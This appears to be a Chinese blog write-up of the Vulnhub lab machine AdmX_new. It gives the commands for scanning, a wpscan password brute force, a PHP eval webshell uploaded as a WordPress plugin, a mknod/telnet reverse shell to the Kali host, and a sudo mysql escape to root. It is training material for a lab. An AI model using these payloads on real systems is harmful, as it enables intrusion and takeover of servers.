Vulnhub--AdmX_new

0x01靶机介绍

项目Value
镜像链接https://download.vulnhub.com/admx/AdmX_new.7z
作者未知
发布日期2021年5月11日
难度中等
目的获取root权限

0x02靶机搭建

工具:VMware Workstation 17.0
镜像:AdmX_new.7z

搭建方式

解压AdmX_new.7z
VMware Workstation 17.0:
1.文件–>打开–>AdmX_new.ova,配置默认即可

在这里插入图片描述2.打开攻击机Kali(NAT模式)和靶机

NAT网段:192.168.47.0/24
Kali的ip地址: 192.168.47.128

0x03渗透流程

一.信息收集

1.主机发现
sudo netdiscover -i eth0

-i :网卡(ifconfig查看)
在这里插入图片描述

2.端口扫描
nmap -sV -p- 192.168.47.129

在这里插入图片描述

3.指纹收集
whatweb http://192.168.47.129

在这里插入图片描述

4.web目录扫描
dirb http://192.168.47.129 

发现是wordpress cms
在这里插入图片描述

二.漏洞挖掘

1.getshell
wpscan --url http://192.168.47.129

没有扫到什么可以利用的信息
在这里插入图片描述
使用wpscan在wordpress的登陆页面进行暴力破解

wpscan –url http://192.168.47.129/wordpress/ –password-attack xmlrpc -U admin -P /usr/share/wordlists/rockyou.txt

得到一个用户名和密码:admin/adam14
在这里插入图片描述
使用Burp抓包发现js相应地址不对
在这里插入图片描述
设置里添加相应包将192.168.159.145替换为192.168.47.129然后刷新界面
在这里插入图片描述在这里插入图片描述
进入登陆界面登陆
在这里插入图片描述
生成一个PHP文件内容为

<?php

/**

 * Plugin Name:Webshell

 * Plugin URI:1111

 * Description:WP Webshell for Pentest

 * Version:1.0

 * Author:1111

 * Author URI:1111

 * License:1111

 */


 @eval($_POST['cmd']); 
 
 
 ?>

压缩成zip后缀
在文件上传处上传

在这里插入图片描述
点击Activate激活
在这里插入图片描述
访问链接后使用蚁剑连接

http://192.168.47.129/wordpress/wp-content/plugins/shell.php

在这里插入图片描述
信息收集为低权限www
在这里插入图片描述

2.提权

kali开启监听:

nc -lvvp 7777  

蚁剑执行:

mknod a p; telnet 192.168.47.128 7777 0<a | /bin/bash 1>a

成功获取反弹shell,

python3 -c "import pty;pty.spawn('/bin/bash')"
cat /etc/passwd

在这里插入图片描述
尝试用密码adam14登陆wpadmin用户成功
在这里插入图片描述

sudo -l

可以看到无需密码即可执行mysql登陆
在这里插入图片描述
mysql数据库密码adam14,进入后获取bash shell

\! /bin/bash

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值